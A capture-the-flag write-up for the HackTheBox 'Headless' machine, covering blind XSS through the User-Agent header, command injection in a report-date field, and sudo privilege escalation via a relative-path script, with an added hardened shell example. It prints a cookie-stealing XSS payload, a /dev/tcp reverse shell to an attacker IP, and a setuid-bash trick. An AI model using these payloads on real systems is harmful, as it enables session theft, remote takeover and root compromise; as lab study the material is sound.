Headless machine write-up HackTheBox

Mahmoud gamal
6 min read · Apr 9, 2024

I tried to visit the website but it returned an error, so we're going to start with a simple nmap scan to see what we are dealing with. I used this command:

nmap -sC -sT -sV 10.10.11.8
  • -sC to run the default scripts
  • -sT to run a TCP connect scan
  • -sV to enable version detection

And I found some interesting things: there are two open ports, 22 and 5000. Port 22 is used for SSH, but I didn't know what 5000 was used for, so I searched for it and found it is used by UPnP devices (printers, consoles, smart TVs, routers, etc.)

Now I tried to visit 10.10.11.8:5000

As you can see, it's a page with a countdown and a button for questions. Nothing much, honestly.

I'm going to look for any hidden paths. I'm going to use dirsearch, but of course use whatever you are comfortable with.

dirsearch had been running for about 15 minutes, but I didn't find anything except support and dashboard, which I'm not authorized to view. I also looked at the page source for any endpoints or JS files I could look into, but it was a dead end.

So, the support page:

I captured the request; it looks pretty normal.

I'm going to try submitting some special characters and see if it gives me any errors.

As you can see, we made the app angry, and that's an absolute success.

There's something I just noticed: the request we send to support has a cookie parameter is_admin with an encrypted value.

Sadly, hashid said that it's an unknown hash, so it's a dead end I guess?

I noticed something when I tried special characters (<>): it says it's going to send a report to the administrators to investigate. Usually this report will be on the same web app or sent via email. Let's hope it's the same app, so maybe we can steal a session or do some other account takeover. After a lot of failed attempts I found that I was being stupid, since a request is being reflected in the page, so it may have an XSS in it. I tried to inject a simple payload

<img src=x onerror=alert(document.cookie)>

in the message, but it didn't work. I tried the User-Agent header and bingo, it worked.

Now we can steal the admin's cookies via XSS. It's quite simple actually; here's the payload I used

<img src=x onerror=fetch('http://{your ip}/'+document.cookie);>

You also need to receive the cookies. I'm going to use the simple HTTP server in Python, but use whatever listener you want

python3 -m http.server 80

When it gets sent to the admin it will return his cookies, and it worked!

As you can see, we received the cookie. Now let's try using it in the is_admin parameter and visit the dashboard again

And we are in.

As you can see, we can generate a health report for system health, so let's intercept the request.

For all Burp users, don't get offended, but as you can see in ZAP the request contains a date, and I'm going to try to inject a simple Linux command and see if it returns anything.

As you can see, it returned the working directory. Let's try a reverse shell, and remember it's a Linux machine.

I'm going to use https://www.revshells.com/ and netcat as a listener.

First I used this payload

sh -i >& /dev/tcp/10.10.16.90/9001 0>&1

netcat listener

nc -nvlp 9001

It didn't work, and it says I am not authorized or something. But since we can already run some commands like echo, ls and others, I'm going to try to create the payload via the request

echo '#!/bin/bash' > reverse_shell.sh && echo 'sh -i >& /dev/tcp/10.10.16.90/9001 0>&1' >> reverse_shell.sh

And don't forget to URL-encode it so it works.

After some messing around, it worked.

Now let's run it and see if we can get a connection.

Absolute success.

And we got the first flag.

Now let's get to the privilege escalation.

As you can see, we are a user called dvir. Let's see what commands dvir can execute via sudo.

You can see that he can run /usr/bin/syscheck with no password, and that's a good start. Let's check it out.

As you can see, it's a bash script that must run as root. It checks some values and retrieves some information about the system, but the interesting part is here:

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
    /usr/bin/echo "Database service is not running. Starting it..."
    ./initdb.sh 2>/dev/null
else
    /usr/bin/echo "Database service is running."
fi

It checks whether initdb.sh is running and, if not, runs it. Note that it runs ./initdb.sh, a relative path resolved from whatever directory we call syscheck from, so maybe we can modify (or supply) this file to gain root access.

After looking, I didn't find the file, so I'm going to create a new one and make it read the root flag.

Sadly it didn't work, I don't know why, but after some searching I found an easier way, a "setuid privilege escalation". You can read more about it here: https://medium.com/go-cyber/linux-privilege-escalation-with-suid-files-6119d73bc620

First we're going to create the initdb.sh file and echo chmod u+s /bin/bash into it
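For comparison, here is how that block could be written so it cannot be abused from a writable working directory. This is an added example, not the box's own syscheck script and not code from the original post; it assumes GNU stat, and INITDB_PATH is a placeholder location for the helper. It refuses relative paths and any helper that is not owned by the expected uid (root by default) or is writable by group or others.

```shell
#!/bin/bash
# Added example (not the box's own syscheck): a hardened version of the
# "start initdb.sh if it is not running" block quoted above.
# The original runs ./initdb.sh, i.e. whatever file happens to sit in the
# caller's current directory, while executing as root via sudo.
# This version only runs a helper at one fixed absolute path and refuses it
# unless it is owned by the expected uid (root by default) and is not
# writable by group or others. INITDB_PATH is an assumed location.
INITDB_PATH="${INITDB_PATH:-/opt/syscheck/initdb.sh}"

# safe_to_run <path> [expected_uid]
# Returns 0 only if <path> is absolute, a regular file, owned by
# expected_uid (default 0), and has no group/other write bit.
safe_to_run() {
    path="$1"
    want_uid="${2:-0}"
    case "$path" in
        /*) ;;
        *) echo "refusing relative path: $path" >&2; return 1 ;;
    esac
    [ -f "$path" ] || { echo "not a regular file: $path" >&2; return 1; }
    owner=$(stat -c '%u' "$path") || return 1
    [ "$owner" = "$want_uid" ] || {
        echo "unexpected owner uid $owner (want $want_uid): $path" >&2
        return 1
    }
    # symbolic mode, e.g. -rwxr-xr-x: char 6 is group write, char 9 is other write
    perms=$(stat -c '%A' "$path") || return 1
    case "$perms" in
        ?????w*|????????w*)
            echo "group/other writable ($perms): $path" >&2
            return 1 ;;
    esac
    return 0
}

# Drop-in replacement for the quoted block: same messages, but the helper is
# validated and invoked by absolute path instead of ./initdb.sh.
start_db_if_needed() {
    if /usr/bin/pgrep -x "initdb.sh" >/dev/null 2>&1; then
        /usr/bin/echo "Database service is running."
        return 0
    fi
    /usr/bin/echo "Database service is not running. Starting it..."
    safe_to_run "$INITDB_PATH" || return 1
    "$INITDB_PATH" 2>/dev/null
}
```

With this check in place, dropping an initdb.sh into the current directory (as done later in this write-up) has no effect, because the script never looks there.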

echo "chmod u+s /bin/bash" > initdb.sh

This command prepares the script file that will set the setuid bit on /bin/bash.

Then make it an executable file

chmod +x initdb.sh

And we're going to run syscheck

sudo /usr/bin/syscheck

Now when I run /bin/bash -p I should get root access

B@@m! We got root access.

Now the flag, and done.
